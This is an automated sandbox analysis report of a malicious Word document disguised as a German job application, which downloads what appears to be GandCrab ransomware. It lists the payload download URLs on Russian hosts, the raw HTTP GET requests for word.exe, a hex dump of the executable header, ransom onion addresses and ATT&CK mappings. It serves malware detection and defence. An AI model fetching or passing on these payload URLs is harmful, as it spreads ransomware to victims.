Analysis Report Sarah_Siedler_Bewerbungsunterlagen.doc

Overview

General Information

Joe Sandbox Version:	25.0.0 Tiger's Eye
Analysis ID:	821799
Start date:	21.03.2019
Start time:	13:59:55
Joe Sandbox Product:	Cloud
Overall analysis duration:	0h 7m 56s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Sarah_Siedler_Bewerbungsunterlagen.doc
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 7 (Office 2010 SP2, Java 1.8.0_40 1.8.0_191, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies	HCA enabled EGA enabled HDC enabled GSI enabled (VBA)
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.spre.phis.spyw.expl.evad.winDOC@7/398@5/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 16.8% (good quality ratio 16.4%) Quality average: 78.2% Quality standard deviation: 24.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 104 Number of non-executed functions: 169
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .doc Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtAllocateVirtualMemory calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryAttributesFile calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtSetInformationFile calls found. Report size getting too big, too many NtWriteFile calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: powershell.exe

Detection

Strategy	Score	Range	Reporting	Whitelisted	Detection
Threshold	100	0 - 100	Report FP / FN	false

Confidence

Strategy	Score	Range	Further Analysis Required?	Confidence
Threshold	5	0 - 5	false

Classification

Analysis Advice

Sample does not show any behavior and checks for the installed Java version. Likely requires a different JRE version.

Sample is looking for USB drives. Launch the sample with the USB Fake Disk cookbook

Sample may offer command line options, please run it with the 'Execute binary with arguments' cookbook (it's possible that the command line switches require additional characters like: "-", "/", "--")

Uses HTTPS for network communication, use the 'Proxy HTTPS (port 443) to read its encrypted data' cookbook for further analysis

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control
Replication Through Removable Media1	PowerShell2	Startup Items1	Startup Items1	Disabling Security Tools11	Credential Dumping	Peripheral Device Discovery11	Taint Shared Content1	Man in the Browser1	Data Encrypted1	Standard Cryptographic Protocol1
Replication Through Removable Media	Scripting12	Hidden Files and Directories1	Process Injection1	Scripting12	Network Sniffing	Security Software Discovery31	Replication Through Removable Media1	Data from Local System11	Exfiltration Over Other Network Medium	Standard Non-Application Layer Protocol3
Drive-by Compromise	Exploitation for Client Execution13	Accessibility Features	Path Interception	Obfuscated Files or Information2	Input Capture	File and Directory Discovery1	Windows Remote Management	Screen Capture1	Automated Exfiltration	Standard Application Layer Protocol13
Exploit Public-Facing Application	Command-Line Interface1	System Firmware	DLL Search Order Hijacking	Hidden Files and Directories1	Credentials in Files	System Information Discovery53	Logon Scripts	Input Capture	Data Encrypted	Connection Proxy1
Spearphishing Link	Command-Line Interface	Shortcut Modification	File System Permissions Weakness	Process Injection1	Account Manipulation	Process Discovery2	Shared Webroot	Data Staged	Scheduled Transfer	Standard Cryptographic Protocol
Spearphishing Attachment	Graphical User Interface	Modify Existing Service	New Service	DLL Search Order Hijacking	Brute Force	Remote System Discovery1	Third-party Software	Screen Capture	Data Transfer Size Limits	Commonly Used Port

Signature Overview

Click to jump to signature section

AV Detection:

Antivirus detection for URL or domain

Show sources

Source: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe	Avira URL Cloud: Label: malware
Source: http://sndtgo.ru/word.exe	Avira URL Cloud: Label: malware

Antivirus detection for submitted file

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc

Avira: Label: W97M/Dldr.Sload.dqyyh

Multi AV Scanner detection for submitted file

Show sources

Source: Sarah_Siedler_Bewerbungsunterlagen.doc

virustotal: Detection: 47%

Perma Link

Spreading:

Infects executable files (exe, dll, sys, html)

Show sources

Source: C:\Windows\Temp\229.exe

System file written: C:\Users\user\AppData\Roaming\.jre\Welcome.html

Jump to behavior

Checks for available system drives (often done to infect USB drives)

Show sources

Source: C:\Windows\Temp\229.exe	File opened: z:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: x:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: v:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: t:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: r:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: p:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: n:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: l:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: j:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: h:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: f:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: b:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: y:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: w:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: u:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: s:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: q:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: o:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: m:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: k:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: i:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: g:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: c:	Jump to behavior
Source: C:\Windows\Temp\229.exe	File opened: a:	Jump to behavior

Enumerates the file system

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows	Jump to behavior

Contains functionality to enumerate / list files inside a directory

Show sources

Source: C:\Windows\Temp\229.exe	Code function: 5_2_00408A8F lstrlenW,FindFirstFileExW,FindFirstFileW,FindNextFileW,CloseHandle,	5_2_00408A8F
Source: C:\Windows\Temp\229.exe	Code function: 5_2_0042C8FB FindFirstFileExW,	5_2_0042C8FB
Source: C:\Windows\Temp\229.exe	Code function: 5_1_0042C8FB FindFirstFileExW,	5_1_0042C8FB

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Windows\System32\cmd.exe

Jump to behavior

Potential document exploit detected (performs DNS queries)

Show sources

Source: global traffic

DNS query: name: starstyl.ru

Potential document exploit detected (performs HTTP gets)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49223 -> 92.53.98.31:443

Potential document exploit detected (unknown TCP traffic)

Show sources

Source: global traffic

TCP traffic: 192.168.1.16:49223 -> 92.53.98.31:443

Networking:

Found Tor onion address

Show sources

Source: 229.exe	String found in binary or memory: roject.org/ \| 1. Install Tor browser \| 2. Open Tor Browser \| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/
Source: 229.exe, 00000005.00000002.1855736795.00413000.00000004.sdmp	String found in binary or memory: \| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/{USERID}
Source: 229.exe, 00000005.00000002.1859406137.069B0000.00000004.sdmp	String found in binary or memory: \| 3. Open link in TOR browser: http://gandcrabmfe6mnef.onion/fa404de73c4e0000

Connects to country known for bullet proof hosters

Show sources

Source: unknown	Network traffic detected: IP: 90.156.201.98 Russian Federation
Source: unknown	Network traffic detected: IP: 92.53.96.93 Russian Federation
Source: unknown	Network traffic detected: IP: 92.53.98.31 Russian Federation
Source: unknown	Network traffic detected: IP: 78.155.218.207 Russian Federation

Downloads executable code via HTTP

Show sources

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKServer: nginx/1.2.1Date: Thu, 21 Mar 2019 13:01:22 GMTContent-Type: application/octet-streamContent-Length: 548352Last-Modified: Mon, 18 Mar 2019 17:47:26 GMTConnection: keep-aliveAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 1b cc d3 bd 3e 03 9d 4e 2f 59 31 5a b9 af 94 d7 8c ca 5f c1 6a 74 e7 ae 14 1f 50 39 93 93 07 c7 c9 6b 11 c9 60 44 db 44 80 ec 64 e3 f4 9a 50 b7 d6 5d 3b b7 f4 9c 7e 0e 26 07 2a e9 a6 98 13 c0 45 f2 c5 a7 79 8e 51 1f bd 85 3a 0a a0 1b 7a 12 c1 8c b2 6e 21 dc 31 07 85 7e 3e 50 d9 94 1c e9 45 7e 3d 4c 9b 83 2c 9a de e6 ac 71 de be 8b b6 5b cd 4c de d0 cc 07 4c 22 9c 14 f4 d4 c7 0f f6 50 45 00 00 4c 0

HTTP GET or POST without a user agent

Show sources

Source: global traffic	HTTP traffic detected: GET /assets/plugins/managermanager/widgets/colors/word.exe HTTP/1.1Host: prostor-rybalka.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /word.exe HTTP/1.1Host: sndtgo.ruConnection: Keep-Alive

Internet Provider seen in connection with other malware

Show sources

Source: Joe Sandbox View	ASN Name: unknown unknown
Source: Joe Sandbox View	ASN Name: unknown unknown

Downloads files

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word

Jump to behavior

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET /assets/plugins/managermanager/widgets/colors/word.exe HTTP/1.1Host: prostor-rybalka.ruConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /word.exe HTTP/1.1Host: sndtgo.ruConnection: Keep-Alive

Found strings which match to known social media urls

Show sources

Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	String found in binary or memory: NC:uriTemplate="https://compose.mail.yahoo.com/?To=%s" /> equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	String found in binary or memory: <NC:possibleApplication RDF:resource="urn:handler:web:https://compose.mail.yahoo.com/?To=%s"/> equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	String found in binary or memory: <RDF:Description RDF:about="urn:handler:web:https://compose.mail.yahoo.com/?To=%s" equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1815845600.06FFE000.00000004.sdmp	String found in binary or memory: yahoo.abouthome+ equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1815845600.06FFE000.00000004.sdmp	String found in binary or memory: yahoo.contextmenu, equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1815845600.06FFE000.00000004.sdmp	String found in binary or memory: yahoo.searchbar- equals www.yahoo.com (Yahoo)
Source: 229.exe, 00000005.00000003.1815845600.06FFE000.00000004.sdmp	String found in binary or memory: yahoo.urlbar. equals www.yahoo.com (Yahoo)

Performs DNS lookups

Show sources

Source: unknown

DNS traffic detected: queries for: starstyl.ru

Urls found in memory or binary data

Show sources

Source: 229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmp	String found in binary or memory: http://apache.org/xml/features/disallow-doctype-decl
Source: 229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmp	String found in binary or memory: http://apache.org/xml/properties/xpointer-schema
Source: 229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmp	String found in binary or memory: http://apache.org/xml/properties/xpointer-schema.
Source: 229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmp	String found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: http://casper.beckman.uiuc.edu/~c-tsai4
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: http://chasen.aist-nara.ac.jp/chasen/distribution.html
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmp	String found in binary or memory: http://clients1.google.com/ocsp0
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp, powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exe
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exeH
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: http://cosmo-wedding.ru/assets/snippets/ajaxSearch/js/ajaxSearch1/word.exet
Source: 229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmp	String found in binary or memory: http://cps.root-x1.letsencrypt.org0
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://crl.geotrust.com/crls/secureca.crl0N
Source: 229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmp	String found in binary or memory: http://crl.identrust.com/DSTROOTCAX3CRL.crl0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl.thawte.com/ThawtePCA.crl0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: 229.exe, 00000005.00000002.1858172794.064A5000.00000004.sdmp	String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: 229.exe, 00000005.00000003.1774155853.06F90000.00000004.sdmp	String found in binary or memory: http://dl.javafx.com/javafx-cache.jnlp
Source: 229.exe, 00000005.00000003.1774155853.06F90000.00000004.sdmp	String found in binary or memory: http://dl.javafx.com/javafx-rt.jnlp
Source: 229.exe, 00000005.00000003.1787687899.06F90000.00000004.sdmp	String found in binary or memory: http://download.oracle.com/javase/7/docs/technotes/guides/plugin/
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmp	String found in binary or memory: http://g.symcb.com/crls/gtglobal.crl0
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmp	String found in binary or memory: http://g.symcd.com0
Source: 229.exe, 229.exe, 00000005.00000002.1855736795.00413000.00000004.sdmp	String found in binary or memory: http://gandcrabmfe6mnef.onion/
Source: 229.exe, 00000005.00000002.1859406137.069B0000.00000004.sdmp	String found in binary or memory: http://gandcrabmfe6mnef.onion/fa404de73c4e0000
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/file/tip/src/share/native/sun/security/ec/impl
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: http://hg.openjdk.java.net/openjfx/8u/rt
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	String found in binary or memory: http://home.netscape.com/NC-rdf#
Source: 229.exe, 00000005.00000002.1860209799.06CA8000.00000004.sdmp	String found in binary or memory: http://isrg.trustid.ocsp.identrust.com0;
Source: 229.exe, 00000005.00000003.1780112586.06F90000.00000004.sdmp	String found in binary or memory: http://jax-ws.java.net/features/databinding
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://mozilla.org/MPL/2.0/.
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.com0K
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://ocsp.digicert.com0O
Source: 229.exe, 00000005.00000003.1782525967.06F90000.00000004.sdmp	String found in binary or memory: http://ocsp.example.net:80
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://ocsp.thawte.com0
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: http://opensource.org/licenses/bsd-license.php
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmp	String found in binary or memory: http://pki.google.com/GIAG2.crl0
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmp	String found in binary or memory: http://pki.google.com/GIAG2.crt0
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: http://prostor-rybalka.ru/assets/plugins/managermH
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exe
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: http://prostor-rybalka.ru/assets/plugins/managermanager/widgets/colors/word.exeH
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: http://prostor-rybalka.ruH
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: http://prostor-rybalka.ruh%
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://relaxngcc.sf.net/).
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmp	String found in binary or memory: http://s2.symcb.com0
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://s2.symcb.com0k
Source: 229.exe, 00000005.00000003.1780112586.06F90000.00000004.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/soap/http
Source: powershell.exe, 00000004.00000002.1673176192.02266000.00000004.sdmp	String found in binary or memory: http://sndtgo.ru/word.exe
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: http://sndtgo.ru/word.exeH
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: http://sndtgo.ruH
Source: powershell.exe, 00000004.00000002.1672790142.01F9C000.00000004.sdmp	String found in binary or memory: http://sndtgo.ruh%
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://tartarus.org/~martin/PorterStemmer
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://th.symcb.com/th.crl0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://th.symcb.com/th.crt0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://th.symcd.com0&
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://upx.sourceforge.net/upx-license.html.
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://upx.tsx.org
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://wildsau.idv.uni-linz.ac.at/mfx/upx.html
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.apache.org/).
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.apache.org/licenses/
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: 229.exe, 00000005.00000003.1744723695.06ED0000.00000004.sdmp	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.ecma-international.org
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.ecma-international.org/memento/codeofconduct.htm
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.freebxml.org/
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.freebxml.org/).
Source: 229.exe, 00000005.00000003.1777533617.06F90000.00000004.sdmp	String found in binary or memory: http://www.ietf.org/rfc/rfc2373.txt)
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.linuxnet.com
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1817870133.07077000.00000004.sdmp	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/0-1469516994468
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1817870133.07077000.00000004.sdmp	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/1-1469516994468
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1817870133.07077000.00000004.sdmp	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/2-1469516994469
Source: 229.exe, 00000005.00000003.1817847507.0706E000.00000004.sdmp, 229.exe, 00000005.00000003.1817870133.07077000.00000004.sdmp	String found in binary or memory: http://www.mozilla.org/2005/made-up-favicon/3-1469516994470
Source: 229.exe, 00000005.00000003.1807771526.06F90000.00000004.sdmp	String found in binary or memory: http://www.mozilla.org/2006/addons-blocklist
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.nexus.hu/upx
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/goto/opensourcecode/request
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jdk/
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jfr-info/
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-errors
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/enable-exceptions
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/file-io-threshold
Source: 229.exe, 00000005.00000003.1775142968.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/hotspot/jvm/socket-io-threshold
Source: 229.exe, 00000005.00000003.1787687899.06F90000.00000004.sdmp	String found in binary or memory: http://www.oracle.com/technetwork/java/javase/overview/
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://www.symauth.com/cps0(
Source: 229.exe, 00000005.00000003.1808260698.06F9A000.00000004.sdmp	String found in binary or memory: http://www.symauth.com/rpa0)
Source: 229.exe, 00000005.00000003.1808230416.06F94000.00000004.sdmp	String found in binary or memory: http://www.symauth.com/rpa00
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp, 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: http://www.unicode.org/Public/
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp, 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: http://www.unicode.org/Public/.
Source: 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: http://www.unicode.org/cldr/data/.
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.unicode.org/copyright.html.
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp, 229.exe, 00000005.00000003.1786803514.06F90000.00000004.sdmp	String found in binary or memory: http://www.unicode.org/reports/
Source: 229.exe, 00000005.00000003.1787408382.06F90000.00000004.sdmp	String found in binary or memory: http://www.xfree86.org/)
Source: 229.exe, 00000005.00000003.1779457192.06F90000.00000004.sdmp	String found in binary or memory: http://xml.apache.org/xalan-j
Source: 229.exe, 00000005.00000003.1780112586.06F90000.00000004.sdmp	String found in binary or memory: http://xmlns.oracle.com/webservices/jaxws-databinding
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	String found in binary or memory: https://30boxes.com/external/widget?refer=ff&url=%s
Source: 229.exe, 00000005.00000003.1816499856.06F90000.00000004.sdmp	String found in binary or memory: https://compose.mail.yahoo.com/?To=%s
Source: powershell.exe, 00000004.00000002.1672602543.01DD0000.00000004.sdmp	String found in binary or memory: https://cp.masterhost.ru/
